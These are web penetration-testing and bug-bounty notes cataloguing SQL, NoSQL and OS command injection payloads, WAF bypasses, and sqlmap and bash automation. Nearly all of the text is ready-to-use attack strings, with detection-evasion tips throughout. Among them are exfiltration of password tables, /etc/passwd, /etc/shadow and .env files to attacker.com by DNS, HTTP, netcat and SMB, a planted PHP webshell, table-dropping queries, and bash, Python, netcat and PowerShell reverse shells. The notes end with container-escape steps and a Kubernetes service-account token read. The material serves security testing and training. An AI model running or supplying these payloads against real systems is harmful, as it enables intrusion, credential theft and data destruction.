Web VAPT & Bug Bounty Notes#
SQL Injection (SQLi)#
Basic Concepts#
Manipulate database queries through user input to extract data, bypass authentication, or execute commands.
ORMs and prepared statements have reduced SQLi, but vulnerabilities persist in legacy code, raw queries, NoSQL injection, and second-order SQLi. Focus on time-based blind techniques and WAF bypass.
Common Injection Points#
# GET Parameters (most common)
GET /product?id=1' HTTP/1.1
GET /search?query=admin'-- HTTP/1.1
GET /user?name=test' OR '1'='1 HTTP/1.1
# POST Parameters (form data)
POST /login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
username=admin'&password=test
username=admin' OR '1'='1'--&password=anything
# HTTP Headers (less common but high impact)
GET / HTTP/1.1
User-Agent: Mozilla/5.0' OR 1=1--
X-Forwarded-For: 127.0.0.1' UNION SELECT 1,2,3--
Cookie: sessionid=abc123'; DROP TABLE users;--
Referer: http://site.com/page' AND 1=2 UNION SELECT NULL--
# JSON Parameters (modern APIs)
POST /api/login HTTP/1.1
Content-Type: application/json
{"username":"admin\"' OR '1'='1'--","password":"test"}
{"id":"1' UNION SELECT NULL,NULL,NULL--"}
# XML Parameters (SOAP/XML APIs)
POST /api/data HTTP/1.1
Content-Type: application/xml
<user><id>1' OR 1=1--</id></user>
<query><term>test' UNION SELECT NULL--</term></query>
# GraphQL (emerging attack surface in 2025)
POST /graphql HTTP/1.1
Content-Type: application/json
{"query":"{ user(id: \"1' OR '1'='1\") { name email } }"}
# WebSocket messages (real-time applications)
{"action":"getUser","id":"1' OR 1=1--"}
# OPSEC: Multipart form data (file upload + SQLi)
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
------WebKitFormBoundary
Content-Disposition: form-data; name="filename"
test' OR 1=1--.jpg
------WebKitFormBoundary--
Detection Techniques#
-- Basic detection payloads (trigger errors or different behavior)
'
"
`
')
"))
`))
';--
";--
`--
' OR '1'='1
" OR "1"="1
' OR 1=1--
" OR 1=1--
' OR 'x'='x
" OR "x"="x
admin' OR '1'='1
admin' OR 1=1#
admin' OR 1=1/*
-- Boolean-based detection (true/false responses)
' AND '1'='1 -- Should return normal result
' AND '1'='2 -- Should return different/empty result
-- Error-based detection (force database errors)
-- MySQL
' AND (SELECT * FROM (SELECT(SLEEP(0)))a)--
'+(SELECT 0 WHERE 1=0)+'
-- PostgreSQL
' AND 1=CAST('a' AS INTEGER)--
'||(SELECT version())||'
-- MSSQL
' AND 1=CONVERT(INT, @@version)--
'+CAST(@@version AS INT)+'
-- Oracle
' AND 1=CAST('a' AS NUMBER)--
'||(SELECT banner FROM v$version WHERE ROWNUM=1)||'
-- Time-based detection (OPSEC: most reliable, no visible errors)
-- MySQL
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND SLEEP(5)--
' RLIKE SLEEP(5)--
' OR SLEEP(5)--
-- PostgreSQL
' AND (SELECT pg_sleep(5))--
'; SELECT pg_sleep(5)--
' AND 1=(SELECT 1 FROM pg_sleep(5))--
-- MSSQL
'; WAITFOR DELAY '00:00:05'--
' AND 1=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--
-- Oracle
' AND DBMS_LOCK.SLEEP(5)=1--
' AND (SELECT COUNT(*) FROM ALL_USERS t1,ALL_USERS t2,ALL_USERS t3,ALL_USERS t4,ALL_USERS t5)>0--
-- SQLite (common in mobile apps)
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT version()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000)))))--
-- OPSEC: DNS-based detection (out-of-band, bypasses WAF)
-- MySQL (using LOAD_FILE)
' UNION SELECT LOAD_FILE(CONCAT('\\\\',VERSION(),'.',USER(),'.attacker.com\\a'))--
-- MSSQL (using master..xp_dirtree)
'; EXEC master..xp_dirtree '\\\\attacker.com\\a'--
-- Oracle (using UTL_HTTP or UTL_INADDR)
' UNION SELECT UTL_HTTP.REQUEST('http://'||(SELECT user FROM dual)||'.attacker.com') FROM dual--
' UNION SELECT UTL_INADDR.get_host_name((SELECT user FROM dual)||'.attacker.com') FROM dual--
-- PostgreSQL (using COPY or dblink)
'; COPY (SELECT '') TO PROGRAM 'nslookup attacker.com'--
Union-Based SQLi#
-- Determine number of columns (binary search approach - faster)
' ORDER BY 1-- ✓
' ORDER BY 10-- ✓
' ORDER BY 20-- ✗ (error means between 10-20)
' ORDER BY 15-- ✓
' ORDER BY 18-- ✗ (17 columns)
' ORDER BY 17-- ✓
-- Alternative: NULL-based column detection
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
-- Continue until no error (more reliable than ORDER BY)
-- Find injectable columns (determine data types)
' UNION SELECT 1,2,3,4,5,6,7--
' UNION SELECT 'a',2,3,4,5,6,7-- -- Test for string columns
' UNION SELECT 1,'b',3,4,5,6,7--
-- Continue to identify which columns display in response
-- Extract database information (MySQL)
' UNION SELECT 1,database(),version(),4,5,6,7--
' UNION SELECT 1,user(),@@hostname,@@datadir,5,6,7--
' UNION SELECT 1,GROUP_CONCAT(schema_name),3,4,5,6,7 FROM information_schema.schemata--
' UNION SELECT 1,GROUP_CONCAT(table_name),3,4,5,6,7 FROM information_schema.tables WHERE table_schema=database()--
' UNION SELECT 1,GROUP_CONCAT(column_name),3,4,5,6,7 FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT 1,GROUP_CONCAT(username,0x3a,password),3,4,5,6,7 FROM users--
-- MySQL 8.0+ specific (JSON functions for extraction)
' UNION SELECT 1,JSON_ARRAYAGG(username),JSON_ARRAYAGG(password),4,5,6,7 FROM users--
-- Extract data with encoding (bypass filters)
' UNION SELECT 1,TO_BASE64(username),TO_BASE64(password),4,5,6,7 FROM users--
' UNION SELECT 1,HEX(username),HEX(password),4,5,6,7 FROM users--
-- PostgreSQL (version 12+ features)
' UNION SELECT 1,current_database(),version(),4,5,6,7--
' UNION SELECT 1,current_user,inet_server_addr()::text,4,5,6,7--
' UNION SELECT 1,STRING_AGG(tablename,','),3,4,5,6,7 FROM pg_tables WHERE schemaname='public'--
' UNION SELECT 1,STRING_AGG(column_name,','),3,4,5,6,7 FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT 1,STRING_AGG(username||':'||password,','),3,4,5,6,7 FROM users--
-- MSSQL (2019/2022 features)
' UNION SELECT 1,db_name(),@@version,4,5,6,7--
' UNION SELECT 1,SYSTEM_USER,HOST_NAME(),4,5,6,7--
' UNION SELECT 1,STRING_AGG(name,','),3,4,5,6,7 FROM sys.databases--
' UNION SELECT 1,STRING_AGG(name,','),3,4,5,6,7 FROM sys.tables--
' UNION SELECT 1,STRING_AGG(name,','),3,4,5,6,7 FROM sys.columns WHERE object_id=OBJECT_ID('users')--
' UNION SELECT 1,STRING_AGG(username+':'+password,','),3,4,5,6,7 FROM users--
-- Oracle (19c/21c features)
' UNION SELECT 1,user,banner,4,5,6,7 FROM v$version WHERE ROWNUM=1--
' UNION SELECT 1,LISTAGG(table_name,',') WITHIN GROUP(ORDER BY table_name),3,4,5,6,7 FROM all_tables WHERE owner='SYSTEM'--
' UNION SELECT 1,LISTAGG(column_name,',') WITHIN GROUP(ORDER BY column_name),3,4,5,6,7 FROM all_tab_columns WHERE table_name='USERS'--
' UNION SELECT 1,LISTAGG(username||':'||password,',') WITHIN GROUP(ORDER BY username),3,4,5,6,7 FROM users WHERE ROWNUM<=100--
-- OPSEC: Extract data in chunks (avoid large responses that trigger alerts)
' UNION SELECT 1,SUBSTRING(GROUP_CONCAT(password),1,100),3,4,5,6,7 FROM users--
' UNION SELECT 1,SUBSTRING(GROUP_CONCAT(password),101,100),3,4,5,6,7 FROM users--
-- OPSEC: Use LIMIT/OFFSET for pagination
' UNION SELECT 1,username,password,4,5,6,7 FROM users LIMIT 1 OFFSET 0--
' UNION SELECT 1,username,password,4,5,6,7 FROM users LIMIT 1 OFFSET 1--
Blind SQLi Techniques#
-- Boolean-based blind SQLi (content-based)
-- Test true condition (should return normal page)
' AND 1=1--
' AND 'a'='a--
' AND SUBSTRING(user(),1,1)='r'--
-- Test false condition (should return different/error page)
' AND 1=2--
' AND 'a'='b--
' AND SUBSTRING(user(),1,1)='x'--
-- Extract data character by character (MySQL)
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>100--
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))>110--
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1))=112-- (found 'p')
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),2,1))=97-- (found 'a')
-- Binary search optimization (faster extraction)
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1)) BETWEEN 65 AND 90-- (uppercase)
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1)) BETWEEN 97 AND 122-- (lowercase)
' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1)) BETWEEN 48 AND 57-- (digit)
-- Time-based blind SQLi (most reliable in 2025)
-- MySQL
' AND IF(1=1,SLEEP(5),0)--
' AND IF((SELECT LENGTH(database()))>5,SLEEP(5),0)--
' AND IF((SELECT ASCII(SUBSTRING(database(),1,1)))=116,SLEEP(5),0)-- (test for 't')
' AND IF((SELECT COUNT(*) FROM users)>10,SLEEP(5),0)--
-- Optimized time-based extraction (batch testing)
' AND IF((SELECT ASCII(SUBSTRING(password,1,1)) FROM users LIMIT 1) IN (97,98,99,100),SLEEP(5),0)--
-- PostgreSQL
'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--
'; SELECT CASE WHEN (SELECT LENGTH(current_database()))>5 THEN pg_sleep(5) ELSE pg_sleep(0) END--
'; SELECT CASE WHEN (SELECT ASCII(SUBSTRING(current_database(),1,1)))=112 THEN pg_sleep(5) ELSE pg_sleep(0) END--
-- MSSQL
'; IF (1=1) WAITFOR DELAY '00:00:05'--
'; IF (LEN(DB_NAME())>4) WAITFOR DELAY '00:00:05'--
'; IF (ASCII(SUBSTRING((SELECT TOP 1 password FROM users),1,1))=112) WAITFOR DELAY '00:00:05'--
-- Oracle
' AND (SELECT CASE WHEN (1=1) THEN DBMS_LOCK.SLEEP(5) ELSE 0 END FROM dual)=1--
' AND (SELECT CASE WHEN LENGTH(user)>5 THEN DBMS_LOCK.SLEEP(5) ELSE 0 END FROM dual)=1--
-- OPSEC: Conditional time delays (reduce noise)
-- Only delay when condition is true, normal response when false
' AND IF((SELECT SUBSTRING(password,1,1) FROM users LIMIT 1)='a',SLEEP(3),0)--
-- OPSEC: Use shorter delays (faster + less detectable)
' AND IF(1=1,SLEEP(1),0)-- -- 1 second instead of 5
-- OPSEC: Heavy query-based delays (alternative to SLEEP)
-- MySQL
' AND (SELECT COUNT(*) FROM information_schema.tables A, information_schema.tables B, information_schema.tables C)>0--
-- MSSQL
' AND (SELECT COUNT(*) FROM sysusers AS sys1, sysusers AS sys2, sysusers AS sys3)>0--
-- Blind SQLi with DNS exfiltration (out-of-band)
-- MySQL
' AND (SELECT LOAD_FILE(CONCAT('\\\\',SUBSTRING(password,1,32),'.attacker.com\\a')) FROM users LIMIT 1)--
-- PostgreSQL (requires admin privileges)
'; COPY (SELECT password FROM users LIMIT 1) TO PROGRAM 'nslookup $(cat).attacker.com'--
-- MSSQL
'; DECLARE @q VARCHAR(1024); SELECT @q=(SELECT TOP 1 password FROM users); EXEC('master..xp_dirtree "\\'+@q+'.attacker.com\a"')--
Advanced SQLi Techniques#
-- Stacked queries (multiple statements - high impact)
-- PostgreSQL, MSSQL (both support stacked queries)
'; DROP TABLE users;--
'; CREATE TABLE backdoor (cmd VARCHAR(8000));--
'; INSERT INTO backdoor VALUES ('<?php system($_GET["c"]); ?>');--
'; EXEC xp_cmdshell 'whoami';--
-- MySQL (stacked queries work with mysqli_multi_query)
'; UPDATE users SET password='hacked' WHERE username='admin';--
'; INSERT INTO users (username,password,role) VALUES ('hacker','pass','admin');--
-- Second-order SQLi (payload stored then executed later)
-- Step 1: Store malicious payload
INSERT INTO users (username, bio) VALUES ('admin', 'bio' UNION SELECT password FROM users--')
-- Step 2: Payload executes when admin views user profile
SELECT bio FROM users WHERE username='admin'
-- Error-based SQLi (extract data via error messages)
-- MySQL (UpdateXML, ExtractValue)
' AND UpdateXML(1,CONCAT(0x7e,(SELECT database()),0x7e),1)--
' AND ExtractValue(1,CONCAT(0x7e,(SELECT user()),0x7e))--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT password FROM users LIMIT 1),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
-- PostgreSQL (CAST errors)
' AND 1=CAST((SELECT password FROM users LIMIT 1) AS INT)--
' AND 1=CAST((SELECT version()) AS INT)--
-- MSSQL (CAST/CONVERT errors)
' AND 1=CONVERT(INT, (SELECT TOP 1 password FROM users))--
' AND 1=CAST((SELECT @@version) AS INT)--
-- Oracle (invalid type conversion)
' AND 1=TO_NUMBER((SELECT banner FROM v$version WHERE ROWNUM=1))--
-- Out-of-band (OOB) SQLi (2025 techniques)
-- MySQL (DNS exfiltration via LOAD_FILE)
' UNION SELECT LOAD_FILE(CONCAT('\\\\',VERSION(),'.',USER(),'.attacker.com\\a'))--
' UNION SELECT LOAD_FILE(CONCAT('\\\\',(SELECT HEX(password) FROM users LIMIT 1),'.attacker.com\\a'))--
-- MSSQL (multiple OOB methods)
-- xp_dirtree (most common)
'; DECLARE @v VARCHAR(1024); SELECT @v=password FROM users; EXEC('master..xp_dirtree "\\'+@v+'.attacker.com\a"')--
-- xp_fileexist
'; DECLARE @v VARCHAR(1024); SELECT @v=password FROM users; EXEC('master..xp_fileexist "\\'+@v+'.attacker.com\a"')--
-- fn_xe_file_target_read_file (SQL Server 2012+)
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE; EXEC xp_cmdshell 'nslookup attacker.com';--
-- PostgreSQL (requires privileges)
'; CREATE TABLE exfil (data text); COPY exfil FROM PROGRAM 'curl http://attacker.com/exfil?data=$(cat /etc/passwd|base64)';--
-- Oracle (requires Java privileges - rare)
' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/exfil?data='||RAWTOHEX(password)) FROM users WHERE ROWNUM=1--
' UNION SELECT UTL_INADDR.get_host_address((SELECT password FROM users WHERE ROWNUM=1)||'.attacker.com') FROM dual--
-- NoSQL Injection (MongoDB, 2025 focus)
-- Authentication bypass
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": "admin", "password": {"$regex": ".*"}}
-- Data extraction via regex
{"username": "admin", "password": {"$regex": "^a.*"}} // Password starts with 'a'
{"username": "admin", "password": {"$regex": "^ab.*"}} // Starts with 'ab'
-- JavaScript injection in MongoDB
{"username": "admin", "password": {"$where": "this.password.match(/^a/)"}}
{"username": "admin", "password": {"$where": "sleep(5000)"}} // Time-based
-- Operator injection
{"username": "admin", "password": {"$gt": ""}}
{"$where": "this.username == 'admin' && this.password.match(/^pass/)"}
SQLi Automation Tools#
# SQLMap (still the gold standard in 2025)
# Basic usage
sqlmap -u "http://target.com/page?id=1" --batch --random-agent
# Complete database enumeration
sqlmap -u "http://target.com/page?id=1" --dbs --random-agent --threads=5
sqlmap -u "http://target.com/page?id=1" -D database_name --tables --random-agent
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --columns --random-agent
sqlmap -u "http://target.com/page?id=1" -D database_name -T users -C username,password --dump --random-agent
# Using request file from Burp (recommended approach)
sqlmap -r request.txt --batch --level=5 --risk=3 --random-agent --threads=10
# POST data injection
sqlmap -u "http://target.com/login" --data="username=admin&password=test" --level=3 --risk=2
# Cookie injection
sqlmap -u "http://target.com/page" --cookie="sessionid=abc123" --level=2 --risk=2
# Header injection (User-Agent, Referer, X-Forwarded-For)
sqlmap -u "http://target.com/page" --headers="X-Forwarded-For: 1.1.1.1*" --level=3
# JSON injection (modern APIs)
sqlmap -u "http://target.com/api/user" --data='{"id":"1*"}' --method=POST --level=3 --risk=3
# GraphQL injection
sqlmap -u "http://target.com/graphql" --data='{"query":"{ user(id: \"1*\") { name } }"}' --method=POST
# Advanced options (OS shell, file operations)
sqlmap -u "http://target.com/page?id=1" --os-shell # Try to get OS shell
sqlmap -u "http://target.com/page?id=1" --file-read="/etc/passwd" # Read files
sqlmap -u "http://target.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php" # Upload files
# Tamper scripts (WAF bypass - 2025 effective combinations)
sqlmap -u "http://target.com/page?id=1" --tamper="between,randomcase,space2comment" --random-agent
sqlmap -u "http://target.com/page?id=1" --tamper="charencode,base64encode,randomcase" --random-agent
sqlmap -u "http://target.com/page?id=1" --tamper="apostrophemask,apostrophenullencode,appendnullbyte" --random-agent
# OPSEC: Rate-limited testing (avoid detection)
sqlmap -u "http://target.com/page?id=1" --delay=2 --randomize=param --random-agent --tor
# OPSEC: Use proxy chains
sqlmap -u "http://target.com/page?id=1" --proxy="socks5://127.0.0.1:9050" --check-tor --random-agent
# OPSEC: Minimal noise approach
sqlmap -u "http://target.com/page?id=1" --technique=T --level=1 --risk=1 --threads=1 --delay=3
# Modern alternatives (2025)
# Ghauri - Fast, modern SQLi tool
ghauri -u "http://target.com/page?id=1" --level=3 --risk=3 --batch
ghauri -r request.txt --threads=5 --dump-all --batch
# NoSQLMap - MongoDB injection
nosqlmap -u "http://target.com/api/login" -p '{"username":"admin","password":"test"}'
# Custom automated testing script (OPSEC-focused)
#!/bin/bash
# Usage: ./sqli_test.sh "http://target.com/page?id=1"
url="$1"
output="sqli_results_$(date +%Y%m%d_%H%M%S).txt"
delay=2 # OPSEC: Delay between requests
echo "[*] Testing SQL injection on: $url" | tee "$output"
# Time-based detection payloads (least noisy)
time_payloads=(
"' AND SLEEP(5)--"
"' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--"
"' AND BENCHMARK(5000000,MD5('A'))--"
"'; WAITFOR DELAY '00:00:05'--"
"' AND pg_sleep(5)--"
)
for payload in "${time_payloads[@]}"; do
echo "[*] Testing: $payload" | tee -a "$output"
# Measure response time
start_time=$(date +%s)
response=$(curl -s "${url}${payload}" --max-time 10)
end_time=$(date +%s)
duration=$((end_time - start_time))
if [ $duration -ge 5 ]; then
echo "[+] VULNERABLE: Time-based SQLi detected (${duration}s delay)" | tee -a "$output"
echo "[+] Payload: $payload" | tee -a "$output"
fi
sleep $delay # OPSEC: Rate limiting
done
# Error-based detection (only if time-based fails)
error_payloads=(
"'"
"''"
"' OR '1'='1"
"' AND 1=2 UNION SELECT NULL--"
)
echo "[*] Testing error-based injection..." | tee -a "$output"
for payload in "${error_payloads[@]}"; do
echo "[*] Testing: $payload" | tee -a "$output"
response=$(curl -s "${url}${payload}")
# Check for common SQL errors
if echo "$response" | grep -qiE "sql|mysql|postgresql|mssql|oracle|syntax|error|warning|database"; then
echo "[+] POTENTIAL VULNERABILITY: SQL error in response" | tee -a "$output"
echo "[+] Payload: $payload" | tee -a "$output"
echo "$response" | head -n 20 >> "$output"
fi
sleep $delay
done
echo "[*] Testing complete. Results in: $output"
WAF Bypass Techniques#
-- Comment-based bypasses (evade pattern matching)
SELECT/**/user()
SELECT/*comment*/user()
SELECT+user()
SELECT%0Auser() -- Newline
SELECT%09user() -- Tab
SELECT%0Duser() -- Carriage return
-- Case variation (simple but effective)
SeLeCt UsEr()
UNION sElEcT 1,2,3
UnIoN SeLeCt user(),database()
-- Encoding bypasses
-- URL encoding (single and double)
%55%4E%49%4F%4E%20%53%45%4C%45%43%54 -- UNION SELECT
%25%35%35%25%4E%25%34%39 -- Double encoded UN
-- Hex encoding (MySQL)
SELECT 0x48656c6c6f -- "Hello"
SELECT CONCAT(0x53454c454354, 0x2031) -- "SELECT 1"
SELECT CHAR(83,69,76,69,67,84) -- "SELECT"
-- Unicode/UTF-8 encoding
%C0%AE%C0%AE%C0%AF -- ../
%E0%80%AE%E0%80%AE%E0%80%AF -- ../ (overlong encoding)
-- Concatenation tricks
-- MySQL
SELECT CONCAT('UNI','ON')
SELECT CONCAT_WS('','SE','LE','CT')
-- MSSQL
SELECT 'UNI'+'ON'
SELECT 'SE'+'LE'+'CT'
-- PostgreSQL/Oracle
SELECT 'UNI'||'ON'
SELECT 'SE'||'LE'||'CT'
-- Alternative operators (bypass keyword filters)
-- Instead of OR, use ||
WHERE 1=1 || 1=2
-- Instead of AND, use &&
WHERE 1=1 && 2=2
-- Instead of =, use LIKE or IN
WHERE username LIKE 'admin'
WHERE username IN ('admin')
-- Instead of SUBSTRING, use MID, LEFT, RIGHT
MID((SELECT password FROM users LIMIT 1),1,1)
LEFT((SELECT password FROM users LIMIT 1),1)
-- Instead of ASCII, use ORD
ORD(MID((SELECT password FROM users LIMIT 1),1,1))
-- Whitespace bypasses (evade space filters)
SELECT%0Auser() -- Newline
SELECT%09user() -- Tab
SELECT%0Duser() -- Carriage return
SELECT%0Buser() -- Vertical tab
SELECT%A0user() -- Non-breaking space
SELECT%C2%A0user() -- UTF-8 non-breaking space
-- Parentheses manipulation
SELECT(user())
SELECT(user())FROM(dual)
SELECT user()FROM users
-- Scientific notation (bypass number filters)
SELECT 1e0 -- 1
SELECT 2e1 -- 20
WHERE id=1e0
-- Bitwise operators (obfuscation)
SELECT 1|0 -- OR
SELECT 1&1 -- AND
SELECT 1^0 -- XOR
-- OPSEC: WAF bypass with valid SQL + malicious intent
-- Use legitimate-looking queries
' UNION SELECT NULL,username,password,NULL,NULL FROM users WHERE '1'='1
' AND (SELECT 1 FROM users WHERE username='admin' AND SUBSTRING(password,1,1)='a')='1
-- OPSEC: Inline comments (MySQL specific)
SELECT /*!12345 user()*/ -- Only executes if MySQL version >= 12.34.5
SELECT /*!50000 database()*/ -- Version-specific execution
-- Advanced filter bypasses (2025 techniques)
-- String concatenation in WHERE clause
WHERE username='ad'+'min' -- MSSQL
WHERE username=CONCAT('ad','min') -- MySQL
-- Dynamic SQL construction
'; DECLARE @q VARCHAR(100); SET @q='SE'+'LECT'; EXEC(@q+' user()');--
-- JSON field extraction (bypass traditional SQL patterns)
-- MySQL 8.0+
SELECT JSON_EXTRACT(data,'$.password') FROM users WHERE id=1
-- PostgreSQL (JSONB)
SELECT data->>'password' FROM users WHERE id=1
-- Prepared statement bypass (if dynamic SQL used)
'; PREPARE stmt FROM "SELECT * FROM users"; EXECUTE stmt;--
-- XML functions (alternative data extraction)
-- MSSQL
SELECT (SELECT TOP 1 password FROM users FOR XML PATH(''))
Command Injection#
Execute arbitrary operating system commands on the server through vulnerable input fields.
Container environments (Docker, Kubernetes) and serverless functions have changed the attack landscape. Focus on container escapes, cloud metadata access, and lateral movement.
Command Separators#
# Unix/Linux separators
; id # Semicolon - execute regardless of previous command
| id # Pipe - pass output to next command
|| id # OR - execute if previous command fails
& id # Ampersand - run in background
&& id # AND - execute if previous command succeeds
$(id) # Command substitution
`id` # Backticks - command substitution (legacy but still works)
%0a id # Newline (URL encoded)
%0d id # Carriage return (URL encoded)
%0a%0d id # CRLF combination
# Windows separators
& dir # Ampersand
| dir # Pipe
|| dir # OR
&& dir # AND
%0a dir # Newline
# Universal separators (work on both Linux and Windows)
; whoami
| whoami
|| whoami ||
& whoami
&& whoami
$(whoami)
`whoami`
# OPSEC: Background execution (avoid blocking)
& sleep 10 & # Run in background, don't block response
| sleep 10 &
Detection Techniques#
# Time-based detection (most reliable, OPSEC-friendly)
# Linux
; sleep 10
| sleep 10
|| sleep 10 ||
`sleep 10`
$(sleep 10)
& sleep 10 &
# Windows
; ping -n 10 127.0.0.1
| ping -n 10 127.0.0.1
& timeout /t 10
|| ping -n 10 127.0.0.1 ||
# Cross-platform time delays (auto-detect OS)
; sleep 5 || ping -n 5 127.0.0.1
| timeout 5 || sleep 5
&& (sleep 5 || ping -n 5 127.0.0.1)
# OPSEC: Shorter delays (faster testing, less suspicious)
; sleep 3
| ping -c 3 127.0.0.1
& timeout /t 3
# DNS-based detection (out-of-band, bypasses firewalls)
; nslookup `whoami`.attacker.com
| dig $(whoami).attacker.com
|| nslookup $(id | base64 | tr -d '\n').attacker.com ||
& nslookup %USERNAME%.%COMPUTERNAME%.attacker.com
# Alternative DNS tools
; host $(whoami).attacker.com
| curl http://$(whoami).attacker.com
& ping -c 1 $(whoami).attacker.com
# HTTP-based detection (web requests to attacker server)
; curl http://attacker.com/$(whoami)
| wget http://attacker.com/?data=$(id)
& powershell -c "Invoke-WebRequest http://attacker.com/?data=$env:USERNAME"
# OPSEC: Use legitimate services for detection (blend in)
; curl https://ipinfo.io/ip
| wget -qO- https://ifconfig.me
& nslookup google.com
# Error-based detection (trigger unique errors)
; ls /nonexistent_$(whoami)
| cat /etc/passwd_test
& type C:\nonexistent_%USERNAME%
# Boolean-based detection (different responses)
; ls / && echo "success"
| test -f /etc/passwd && echo "exists"
& if exist C:\windows echo "windows"
Blind Command Injection#
# Output redirection to web-accessible location
; whoami > /var/www/html/output.txt
| id > /tmp/output && cp /tmp/output /var/www/html/
|| echo $(cat /etc/passwd) > /var/www/html/data.txt ||
& hostname > /usr/share/nginx/html/result.txt
# Alternative web paths (common in 2025)
; env > /var/www/html/env.txt
| pwd > /app/public/pwd.txt
& whoami > /opt/webapp/static/user.txt
# Windows output redirection
; whoami > C:\inetpub\wwwroot\output.txt
| dir > C:\xampp\htdocs\result.txt
& set > C:\wamp64\www\env.txt
|| echo %USERNAME% > C:\Program Files\nginx\html\user.txt ||
# Out-of-band data exfiltration (Linux)
# HTTP POST with data
; curl -X POST http://attacker.com/data -d "$(cat /etc/passwd)"
| wget --post-data="data=$(whoami)" http://attacker.com/collect
|| curl http://attacker.com/exfil?data=$(cat /etc/passwd | base64 | tr -d '\n') ||
# Netcat exfiltration
; nc attacker.com 4444 < /etc/passwd
| cat /etc/shadow | nc attacker.com 4444
& nc -w 3 attacker.com 4444 < /etc/hosts
# DNS exfiltration (works through most firewalls)
; nslookup $(cat /etc/passwd | base64 | tr -d '\n' | cut -c1-63).attacker.com
| for i in $(cat /etc/passwd | base64 | fold -w 63); do nslookup $i.attacker.com; done
|| dig $(cat /app/.env | base64 | head -c 63).attacker.com ||
# OPSEC: Chunked exfiltration (avoid data limits)
; cat /etc/passwd | head -n 10 | base64 | xargs -I {} curl http://attacker.com/{}
| split -b 100 /etc/passwd /tmp/chunk && for f in /tmp/chunk*; do curl -d @$f http://attacker.com/; done
# Windows out-of-band exfiltration
# PowerShell web request
; powershell -c "Invoke-WebRequest -Uri http://attacker.com/data -Method POST -Body (Get-Content C:\windows\win.ini)"
& powershell -c "$data=[Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\windows\win.ini')); Invoke-WebRequest http://attacker.com/$data"
# Certutil (legitimate Windows tool for file transfer)
; certutil -urlcache -split -f http://attacker.com/test.txt C:\temp\test.txt
| certutil -encode C:\windows\win.ini C:\temp\encoded.txt && certutil -urlcache -split -f http://attacker.com/upload -d @C:\temp\encoded.txt
# DNS exfiltration (Windows)
; nslookup %USERNAME%.%COMPUTERNAME%.attacker.com
| powershell -c "$env:USERNAME + '.' + $env:COMPUTERNAME + '.attacker.com' | nslookup"
# SMB exfiltration (Windows - covert channel)
; net use \\attacker.com\share /user:guest ""
| copy C:\windows\win.ini \\attacker.com\share\
Advanced Techniques#
# Reverse shells (modern techniques)
# Bash TCP reverse shell (most reliable)
; bash -i >& /dev/tcp/attacker.com/4444 0>&1
| bash -c 'exec bash -i &>/dev/tcp/attacker.com/4444 <&1'
# Python reverse shell (common in 2025 environments)
; python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
# Netcat reverse shell (if nc available)
; nc -e /bin/bash attacker.com 4444
| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc attacker.com 4444 >/tmp/f
# OPSEC: Encrypted reverse shell (avoid IDS detection)
; openssl s_client -quiet -connect attacker.com:4444 | /bin/bash | openssl s_client -quiet -connect attacker.com:4444
# PowerShell reverse shell (Windows)
; powershell -nop -c "$client=New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# OPSEC: Fileless PowerShell (avoid disk artifacts)
; powershell -nop -w hidden -enc <BASE64_ENCODED_PAYLOAD>
# Container escape techniques (Docker/Kubernetes 2025)
# Check if running in container
; cat /proc/1/cgroup | grep docker
| cat /proc/self/mountinfo | grep docker
& hostname | grep -E '[a-f0-9]{12}' # Docker container hostnames
# Mount host filesystem (if privileged container)
; mkdir /hostfs && mount /dev/sda1 /hostfs && ls /hostfs
| fdisk -l && mount /dev/sda1 /mnt && cat /mnt/etc/shadow
# Access Docker socket (if mounted)
; docker -H unix:///var/run/docker.sock ps
| docker -H unix:///var/run/docker.sock run -v /:/hostfs -it alpine chroot /hostfs sh
# Kubernetes service account token access
; cat /var/run/secrets/kubernetes.io/serviceaccount/token
